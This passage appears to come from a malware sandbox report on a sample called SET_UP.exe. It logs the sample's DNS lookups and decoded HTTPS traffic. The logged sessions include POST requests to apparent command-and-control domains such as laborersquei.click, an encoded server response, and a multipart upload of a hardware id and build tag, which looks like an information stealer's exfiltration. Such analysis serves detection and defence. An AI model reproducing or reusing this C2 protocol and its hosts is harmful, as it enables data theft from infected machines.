                                                                                                                                          Dec 25, 2024 22:17:44.193202972 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.193212032 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.193253040 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.378156900 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.378180027 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.378235102 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.378268003 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.378287077 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.378353119 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.381603003 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.381618977 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.381652117 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.381659985 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.381696939 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.381696939 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.385790110 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.385803938 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.385889053 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.385898113 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.386008024 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.389225006 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.389240980 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.389277935 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.389329910 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.389329910 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.389339924 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.389359951 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.389415026 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.398392916 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.398407936 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:44.398422003 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:44.398428917 CET44349744172.67.214.186192.168.2.4

                                                                                                                                          UDP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Dec 25, 2024 22:17:11.197670937 CET5359053192.168.2.41.1.1.1
                                                                                                                                          Dec 25, 2024 22:17:11.522824049 CET53535901.1.1.1192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:29.195683956 CET6334253192.168.2.41.1.1.1
                                                                                                                                          Dec 25, 2024 22:17:29.427556992 CET53633421.1.1.1192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:29.431082010 CET4931753192.168.2.41.1.1.1
                                                                                                                                          Dec 25, 2024 22:17:29.785937071 CET53493171.1.1.1192.168.2.4

                                                                                                                                          DNS Queries

                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Dec 25, 2024 22:17:11.197670937 CET192.168.2.41.1.1.10x3d93Standard query (0)laborersquei.clickA (IP address)IN (0x0001)false
                                                                                                                                          Dec 25, 2024 22:17:29.195683956 CET192.168.2.41.1.1.10xf2b4Standard query (0)neqi.shopA (IP address)IN (0x0001)false
                                                                                                                                          Dec 25, 2024 22:17:29.431082010 CET192.168.2.41.1.1.10xe755Standard query (0)klipsyzogey.shopA (IP address)IN (0x0001)false

                                                                                                                                          DNS Answers

                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Dec 25, 2024 22:17:11.522824049 CET1.1.1.1192.168.2.40x3d93No error (0)laborersquei.click104.21.89.250A (IP address)IN (0x0001)false
                                                                                                                                          Dec 25, 2024 22:17:11.522824049 CET1.1.1.1192.168.2.40x3d93No error (0)laborersquei.click172.67.166.49A (IP address)IN (0x0001)false
                                                                                                                                          Dec 25, 2024 22:17:29.427556992 CET1.1.1.1192.168.2.40xf2b4Name error (3)neqi.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                          Dec 25, 2024 22:17:29.785937071 CET1.1.1.1192.168.2.40xe755No error (0)klipsyzogey.shop172.67.214.186A (IP address)IN (0x0001)false
                                                                                                                                          Dec 25, 2024 22:17:29.785937071 CET1.1.1.1192.168.2.40xe755No error (0)klipsyzogey.shop104.21.23.250A (IP address)IN (0x0001)false

                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                          • laborersquei.click
                                                                                                                                          • klipsyzogey.shop

                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.449730104.21.89.2504436556C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-25 21:17:12 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 8
                                                                                                                                          Host: laborersquei.click
                                                                                                                                          2024-12-25 21:17:12 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                          Data Ascii: act=life
                                                                                                                                          2024-12-25 21:17:13 UTC1133INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 25 Dec 2024 21:17:13 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=uss5cevt8o6c95s2n5g4f4u2sp; expires=Sun, 20 Apr 2025 15:03:52 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YH1g4%2Bfwi7A3Z3MuFByPzWNq6NMOd0M8vbby%2BN1%2BcdT8LZ6zVm7A%2F08grQeOXgBXpDNXgmv%2B5WhOVwA1SR0C2rJpf1yAATGjgfipawaJOQgoyMYcnnK7VD37%2FK0JyES70kMwevg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8f7bdb4c6c2f7d26-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1797&min_rtt=1791&rtt_var=684&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1585233&cwnd=205&unsent_bytes=0&cid=798cbee67082e534&ts=790&x=0"
                                                                                                                                          2024-12-25 21:17:13 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                          Data Ascii: 2ok
                                                                                                                                          2024-12-25 21:17:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.449731104.21.89.2504436556C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-25 21:17:14 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 80
                                                                                                                                          Host: laborersquei.click
                                                                                                                                          2024-12-25 21:17:14 UTC80OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
                                                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--ELVIRA&j=efdebde057a1df3f7c15b7f4da907c2d
                                                                                                                                          2024-12-25 21:17:15 UTC1127INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 25 Dec 2024 21:17:15 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=fll8tvsm3jabckqjuifchl582j; expires=Sun, 20 Apr 2025 15:03:54 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UJrKU%2B07CSlja6RH6mqxt3yEpiULt85Itl9qQu4FvZaTYTMneXDWBXO5FtRyQmEYS%2BZ5TgNffK2BpGUvowOSmlXZ3K5KElpR0adt3KLzOefq%2F5Igsis5mW68A8jbqS59zyQ42HE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8f7bdb58fc16f78d-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1625&min_rtt=1625&rtt_var=611&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=982&delivery_rate=1790312&cwnd=100&unsent_bytes=0&cid=b9dd03c176653fc4&ts=753&x=0"
                                                                                                                                          2024-12-25 21:17:15 UTC242INData Raw: 33 61 38 38 0d 0a 5a 61 6a 35 70 39 69 42 73 73 71 31 39 51 49 68 6b 77 61 58 72 69 2b 48 76 70 4f 2b 43 65 78 46 36 4b 37 38 5a 36 55 6f 4e 56 4d 65 69 6f 2b 46 34 72 57 65 36 4d 61 51 49 42 76 31 5a 2f 76 64 53 71 75 63 38 74 6f 72 31 69 4f 4a 77 6f 38 43 69 51 70 44 50 6b 65 53 6e 38 61 30 38 74 66 6d 6c 35 42 36 41 36 6c 64 37 49 78 4b 36 5a 79 70 6e 47 79 47 4a 34 6e 43 6e 67 62 4f 52 30 55 2f 42 73 43 56 77 4c 44 6b 30 61 37 55 6d 57 39 45 39 6d 50 32 78 45 48 75 30 2f 76 54 4b 38 42 6e 6a 64 54 65 58 59 64 6c 55 43 63 45 35 5a 6a 55 73 36 50 50 35 73 37 58 5a 30 2b 78 50 4c 58 50 53 75 58 53 39 64 70 69 68 43 32 41 79 70 38 44 7a 31 68 63 4e 51 33 41 6d 38 4f 78 37 74 69 36 32 5a 4e 6f 54 2f 42 70 39 6f 77 44
                                                                                                                                          Data Ascii: 3a88Zaj5p9iBssq19QIhkwaXri+HvpO+CexF6K78Z6UoNVMeio+F4rWe6MaQIBv1Z/vdSquc8tor1iOJwo8CiQpDPkeSn8a08tfml5B6A6ld7IxK6ZypnGyGJ4nCngbOR0U/BsCVwLDk0a7UmW9E9mP2xEHu0/vTK8BnjdTeXYdlUCcE5ZjUs6PP5s7XZ0+xPLXPSuXS9dpihC2Ayp8Dz1hcNQ3Am8Ox7ti62ZNoT/Bp9owD
                                                                                                                                          2024-12-25 21:17:15 UTC1369INData Raw: 70 64 76 70 6e 44 50 4f 64 4c 6a 50 6a 78 54 53 52 30 63 33 52 39 58 56 33 50 72 6b 33 4f 69 50 31 32 68 50 2f 32 48 32 77 30 72 6b 33 4f 50 54 61 34 30 76 67 73 69 55 43 73 68 46 57 54 73 41 77 70 4c 43 74 65 54 59 72 74 69 55 49 41 32 78 59 2b 32 4d 46 61 58 38 34 64 39 6f 6d 69 71 62 6a 49 46 4c 33 67 70 51 50 55 65 53 32 38 4f 30 34 74 32 6f 78 5a 39 72 53 50 52 32 2f 73 56 41 36 4e 7a 38 31 6d 53 4e 4a 34 33 47 6c 41 72 4e 54 6c 6f 38 41 63 71 62 68 66 53 6a 31 37 43 58 7a 79 42 67 39 48 54 79 77 46 75 6e 35 72 48 44 4a 5a 64 6e 6a 63 44 65 58 59 64 43 55 6a 49 45 77 5a 54 47 73 75 6a 43 71 4d 57 52 62 55 62 6a 59 76 44 43 52 2b 62 4f 2b 39 4a 74 6a 53 36 42 78 5a 73 43 77 77 6f 5a 63 51 44 53 32 35 33 36 77 74 32 6a 32 35 31 33 51 37 46 37 75 39 55
                                                                                                                                          Data Ascii: pdvpnDPOdLjPjxTSR0c3R9XV3Prk3OiP12hP/2H2w0rk3OPTa40vgsiUCshFWTsAwpLCteTYrtiUIA2xY+2MFaX84d9omiqbjIFL3gpQPUeS28O04t2oxZ9rSPR2/sVA6Nz81mSNJ43GlArNTlo8AcqbhfSj17CXzyBg9HTywFun5rHDJZdnjcDeXYdCUjIEwZTGsujCqMWRbUbjYvDCR+bO+9JtjS6BxZsCwwoZcQDS2536wt2j2513Q7F7u9U
                                                                                                                                          2024-12-25 21:17:15 UTC1369INData Raw: 64 5a 74 67 53 71 47 6a 4e 42 46 77 46 49 58 61 55 66 67 6d 4e 47 35 36 5a 4b 64 31 4a 6c 75 52 4f 63 6b 36 6f 4a 55 70 64 76 39 6e 44 50 4f 4b 6f 76 45 6d 42 66 49 52 31 51 2f 43 63 57 65 79 72 4c 6a 30 4b 58 53 6b 32 74 49 38 6d 6e 78 33 6b 66 6c 31 50 54 64 59 59 52 6e 78 49 79 5a 48 59 63 53 46 77 41 51 77 64 6e 77 75 65 33 65 72 38 48 58 66 77 33 6f 4a 50 4c 41 44 62 32 63 2f 4e 52 75 69 79 69 4c 78 70 41 41 7a 55 5a 66 50 77 54 59 6c 4d 47 36 37 39 69 69 32 70 6c 6b 53 2f 68 76 2f 73 70 4e 35 4e 61 78 6b 69 75 4a 50 38 71 55 33 6a 48 41 52 6c 6f 2b 52 66 2b 59 79 37 54 6b 78 75 6a 49 32 58 6b 44 39 6d 69 31 6c 41 33 70 31 66 48 58 59 59 6f 6e 6a 63 47 62 42 73 42 4a 57 6a 59 4e 78 4a 7a 42 74 75 72 64 72 74 65 51 5a 45 62 6a 59 66 7a 41 51 61 57 53
                                                                                                                                          Data Ascii: dZtgSqGjNBFwFIXaUfgmNG56ZKd1JluROck6oJUpdv9nDPOKovEmBfIR1Q/CcWeyrLj0KXSk2tI8mnx3kfl1PTdYYRnxIyZHYcSFwAQwdnwue3er8HXfw3oJPLADb2c/NRuiyiLxpAAzUZfPwTYlMG679ii2plkS/hv/spN5NaxkiuJP8qU3jHARlo+Rf+Yy7TkxujI2XkD9mi1lA3p1fHXYYonjcGbBsBJWjYNxJzBturdrteQZEbjYfzAQaWS
                                                                                                                                          2024-12-25 21:17:15 UTC1369INData Raw: 46 70 6b 34 79 5a 43 59 63 53 46 7a 67 4f 32 4a 58 4c 73 2b 37 57 6f 4e 43 5a 62 55 6a 33 62 2f 4c 4c 53 2b 6a 55 2f 4e 6c 6f 6a 79 4f 41 33 70 30 4f 7a 55 64 64 63 55 6d 4b 6e 4e 33 36 75 35 43 50 32 37 35 77 57 4f 4e 79 74 64 4d 44 2f 4a 7a 32 30 43 76 57 5a 34 6e 44 6c 77 72 50 51 6c 67 2b 41 38 53 64 77 37 66 6d 33 36 4c 46 6e 32 35 4f 2b 6d 76 2b 33 6b 33 6f 32 50 33 59 59 34 55 74 79 6f 4c 65 41 74 38 4b 44 33 45 79 78 35 54 46 75 66 57 51 74 35 6d 4f 49 45 54 39 4a 4b 32 4d 51 65 76 63 2f 74 42 6e 68 53 2b 4c 77 4a 41 43 77 6b 4e 66 4f 52 58 4c 6e 38 32 37 37 64 2b 70 30 35 4a 6c 52 2f 5a 67 38 38 4d 4e 71 35 7a 32 78 43 76 57 5a 36 58 72 71 30 66 6d 63 42 63 75 53 64 50 62 77 72 61 6a 69 4f 6a 62 6c 47 78 4c 2f 6d 4c 38 77 45 66 73 31 2f 33 58 62
                                                                                                                                          Data Ascii: Fpk4yZCYcSFzgO2JXLs+7WoNCZbUj3b/LLS+jU/NlojyOA3p0OzUddcUmKnN36u5CP275wWONytdMD/Jz20CvWZ4nDlwrPQlg+A8Sdw7fm36LFn25O+mv+3k3o2P3YY4UtyoLeAt8KD3Eyx5TFufWQt5mOIET9JK2MQevc/tBnhS+LwJACwkNfORXLn8277d+p05JlR/Zg88MNq5z2xCvWZ6Xrq0fmcBcuSdPbwrajiOjblGxL/mL8wEfs1/3Xb
                                                                                                                                          2024-12-25 21:17:15 UTC1369INData Raw: 4a 6b 51 54 47 54 45 55 32 44 74 69 56 79 4c 58 72 32 4b 48 57 6b 32 56 4f 39 32 6a 2f 7a 55 72 72 30 76 6d 63 4a 63 34 67 6b 6f 7a 47 52 65 5a 61 54 43 4d 52 78 37 72 49 74 61 50 50 35 73 37 58 5a 30 2b 78 50 4c 58 46 58 2b 48 52 34 39 56 73 67 43 69 4a 33 70 38 49 7a 46 68 51 50 67 50 4e 6c 38 4f 31 35 64 47 74 33 5a 74 6e 52 76 70 72 2b 59 77 44 70 64 76 70 6e 44 50 4f 43 59 48 66 69 51 62 4a 51 55 45 71 52 39 58 56 33 50 72 6b 33 4f 69 50 31 32 4e 49 2b 6d 44 31 77 45 33 68 30 66 48 4f 5a 49 6b 67 67 38 65 4d 44 38 42 4e 58 44 6b 4d 78 5a 33 58 74 75 33 43 72 63 57 46 49 41 32 78 59 2b 32 4d 46 61 58 71 39 73 78 37 6a 57 57 37 32 70 30 54 7a 45 64 62 63 52 69 45 67 6f 57 39 37 35 44 77 6c 35 46 76 53 76 4a 72 39 4d 56 42 36 4e 6e 34 32 57 71 49 49 34
                                                                                                                                          Data Ascii: JkQTGTEU2DtiVyLXr2KHWk2VO92j/zUrr0vmcJc4gkozGReZaTCMRx7rItaPP5s7XZ0+xPLXFX+HR49VsgCiJ3p8IzFhQPgPNl8O15dGt3ZtnRvpr+YwDpdvpnDPOCYHfiQbJQUEqR9XV3Prk3OiP12NI+mD1wE3h0fHOZIkgg8eMD8BNXDkMxZ3Xtu3CrcWFIA2xY+2MFaXq9sx7jWW72p0TzEdbcRiEgoW975Dwl5FvSvJr9MVB6Nn42WqII4
                                                                                                                                          2024-12-25 21:17:15 UTC1369INData Raw: 33 41 70 49 66 78 36 4b 6e 4d 6e 36 75 35 43 72 30 4a 52 68 53 66 68 6f 2b 73 74 4a 39 39 62 32 7a 6d 71 50 4c 49 66 41 6e 67 6a 4b 51 46 59 34 43 73 61 57 77 72 33 73 31 65 69 5a 31 32 64 62 73 54 79 31 37 55 44 75 30 4b 71 47 4b 35 46 70 6b 34 79 5a 43 59 63 53 46 7a 45 4e 7a 35 48 49 75 65 7a 54 75 74 61 52 63 6b 50 38 62 75 66 47 52 75 44 52 2f 4e 46 6f 69 43 47 42 77 49 77 4d 78 30 6c 63 63 55 6d 4b 6e 4e 33 36 75 35 43 4c 77 49 46 71 52 50 31 79 2f 73 31 4f 38 39 48 68 6e 43 58 4f 4e 6f 33 64 33 6c 33 52 57 6b 41 32 47 49 53 43 68 62 33 76 6b 50 43 58 6b 57 6c 46 39 6d 4c 37 33 6b 6a 6a 30 2f 37 56 59 6f 6f 76 69 63 79 61 41 63 42 50 56 44 30 4d 7a 5a 6a 4b 76 75 72 65 6f 64 6a 58 4c 67 50 32 66 4c 57 55 44 63 54 48 38 74 42 6d 7a 6a 6a 45 31 64 34
                                                                                                                                          Data Ascii: 3ApIfx6KnMn6u5Cr0JRhSfho+stJ99b2zmqPLIfAngjKQFY4CsaWwr3s1eiZ12dbsTy17UDu0KqGK5Fpk4yZCYcSFzENz5HIuezTutaRckP8bufGRuDR/NFoiCGBwIwMx0lccUmKnN36u5CLwIFqRP1y/s1O89HhnCXONo3d3l3RWkA2GISChb3vkPCXkWlF9mL73kjj0/7VYoovicyaAcBPVD0MzZjKvureodjXLgP2fLWUDcTH8tBmzjjE1d4
                                                                                                                                          2024-12-25 21:17:15 UTC1369INData Raw: 43 6c 48 6b 74 76 6c 73 66 58 56 72 38 48 56 56 55 44 2f 61 76 4c 61 44 66 72 6a 76 35 78 71 7a 6e 2b 7a 31 64 34 54 68 78 49 46 66 30 66 59 32 35 33 36 70 4e 4f 36 78 5a 46 6a 56 66 49 6a 79 2f 4a 71 38 39 62 32 7a 47 79 5a 4b 4d 71 43 33 67 71 48 45 6d 35 78 44 73 32 41 31 4b 7a 75 77 4b 2b 58 71 43 34 44 36 53 53 74 6a 48 6a 6d 30 76 2f 62 66 5a 39 71 72 64 71 55 41 74 64 4e 51 44 35 48 68 4e 76 44 2b 72 75 44 35 70 65 54 63 51 4f 70 4e 4b 65 58 47 4c 61 4c 6f 59 35 30 77 44 37 4b 32 74 35 64 6c 51 51 58 49 30 65 53 32 34 4b 35 38 63 4b 75 31 49 46 6a 42 4d 39 61 30 74 5a 41 34 38 76 67 34 6c 57 4a 50 59 66 4b 69 52 53 4c 58 31 51 2f 43 63 32 4e 68 66 53 6a 33 2b 69 50 72 69 41 4c 73 56 75 37 6a 46 57 6c 68 4c 48 70 61 49 41 70 6a 64 71 50 53 4f 42 51
                                                                                                                                          Data Ascii: ClHktvlsfXVr8HVVUD/avLaDfrjv5xqzn+z1d4ThxIFf0fY2536pNO6xZFjVfIjy/Jq89b2zGyZKMqC3gqHEm5xDs2A1KzuwK+XqC4D6SStjHjm0v/bfZ9qrdqUAtdNQD5HhNvD+ruD5peTcQOpNKeXGLaLoY50wD7K2t5dlQQXI0eS24K58cKu1IFjBM9a0tZA48vg4lWJPYfKiRSLX1Q/Cc2NhfSj3+iPriALsVu7jFWlhLHpaIApjdqPSOBQ
                                                                                                                                          2024-12-25 21:17:15 UTC1369INData Raw: 71 4a 68 65 4b 6a 6c 36 76 46 68 57 5a 41 35 32 65 79 38 6e 50 43 30 76 62 64 66 5a 34 77 68 66 4b 67 45 4d 52 45 57 54 59 52 32 39 75 4c 2b 75 79 51 38 4f 37 58 4b 41 50 4f 4b 72 58 55 44 62 32 63 78 4e 39 6c 67 43 43 63 33 64 4d 69 79 55 31 57 4a 78 66 64 6c 49 58 30 6f 39 62 6f 6a 38 55 75 41 2f 56 31 74 5a 51 64 74 34 65 6b 6a 7a 7a 65 64 5a 57 43 68 30 58 52 43 67 39 6a 53 59 71 4a 68 65 4b 6a 6c 36 76 46 68 57 5a 41 35 32 65 79 38 6e 50 43 30 76 62 64 66 5a 34 77 68 59 4f 77 4d 2b 5a 30 61 53 51 45 78 4a 58 43 72 50 4b 51 35 70 65 59 49 42 76 49 4a 4c 32 4d 63 71 75 63 36 5a 77 7a 7a 68 4b 4a 77 70 41 43 30 56 73 61 46 67 6e 4e 6d 74 4f 71 39 4e 2f 6e 2b 61 46 42 41 37 38 6b 38 34 77 56 74 35 4b 78 32 48 72 4f 66 39 71 65 78 56 43 55 48 51 64 6a 47
                                                                                                                                          Data Ascii: qJheKjl6vFhWZA52ey8nPC0vbdfZ4whfKgEMREWTYR29uL+uyQ8O7XKAPOKrXUDb2cxN9lgCCc3dMiyU1WJxfdlIX0o9boj8UuA/V1tZQdt4ekjzzedZWCh0XRCg9jSYqJheKjl6vFhWZA52ey8nPC0vbdfZ4whYOwM+Z0aSQExJXCrPKQ5peYIBvIJL2Mcquc6ZwzzhKJwpAC0VsaFgnNmtOq9N/n+aFBA78k84wVt5Kx2HrOf9qexVCUHQdjG
                                                                                                                                          2024-12-25 21:17:15 UTC1369INData Raw: 69 6f 34 6a 6f 2b 6f 56 6e 55 2f 49 6b 75 34 78 42 70 59 53 78 30 58 6d 4a 4e 34 6d 41 6d 52 2f 41 43 6b 68 2f 48 6f 71 4e 68 65 4b 77 6e 75 6a 46 31 7a 67 44 74 6d 72 34 7a 55 37 72 33 2b 50 4f 62 59 30 78 69 59 75 67 4f 2b 70 59 55 43 45 45 69 4b 72 49 76 76 58 46 71 38 65 51 58 6e 33 63 64 76 4c 63 54 71 66 77 39 74 46 6e 73 42 6d 39 33 5a 6b 56 68 57 78 55 4a 77 53 4b 31 59 57 69 6f 34 6a 6f 2b 6f 56 6e 55 2f 49 6d 32 63 74 41 36 5a 7a 75 6b 6e 4c 4f 4d 63 71 55 7a 55 75 48 57 42 64 70 52 34 32 59 31 36 6a 6c 30 37 37 55 30 46 35 39 33 48 62 79 33 45 36 6e 37 66 7a 59 66 5a 73 6b 6d 73 75 67 4f 2b 70 59 55 43 45 45 69 4c 37 2f 2b 4e 4c 47 71 39 65 5a 5a 77 4f 2f 4a 4f 32 4d 46 61 58 78 34 39 74 37 6a 57 57 76 39 74 77 30 30 55 6c 58 50 77 43 4b 31 59
                                                                                                                                          Data Ascii: io4jo+oVnU/Iku4xBpYSx0XmJN4mAmR/ACkh/HoqNheKwnujF1zgDtmr4zU7r3+PObY0xiYugO+pYUCEEiKrIvvXFq8eQXn3cdvLcTqfw9tFnsBm93ZkVhWxUJwSK1YWio4jo+oVnU/Im2ctA6ZzuknLOMcqUzUuHWBdpR42Y16jl077U0F593Hby3E6n7fzYfZskmsugO+pYUCEEiL7/+NLGq9eZZwO/JO2MFaXx49t7jWWv9tw00UlXPwCK1Y


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.449732104.21.89.2504436556C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-25 21:17:16 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: multipart/form-data; boundary=YOBRJ4S6
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 18104
                                                                                                                                          Host: laborersquei.click
                                                                                                                                          2024-12-25 21:17:16 UTC15331OUTData Raw: 2d 2d 59 4f 42 52 4a 34 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 41 30 37 31 37 33 37 30 30 43 45 42 41 31 37 38 42 38 35 31 35 34 43 39 34 32 31 41 31 38 37 0d 0a 2d 2d 59 4f 42 52 4a 34 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 4f 42 52 4a 34 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a 2d 2d 59 4f 42 52 4a 34 53 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69
                                                                                                                                          Data Ascii: --YOBRJ4S6Content-Disposition: form-data; name="hwid"5A07173700CEBA178B85154C9421A187--YOBRJ4S6Content-Disposition: form-data; name="pid"2--YOBRJ4S6Content-Disposition: form-data; name="lid"hRjzG3--ELVIRA--YOBRJ4S6Content-Disposi
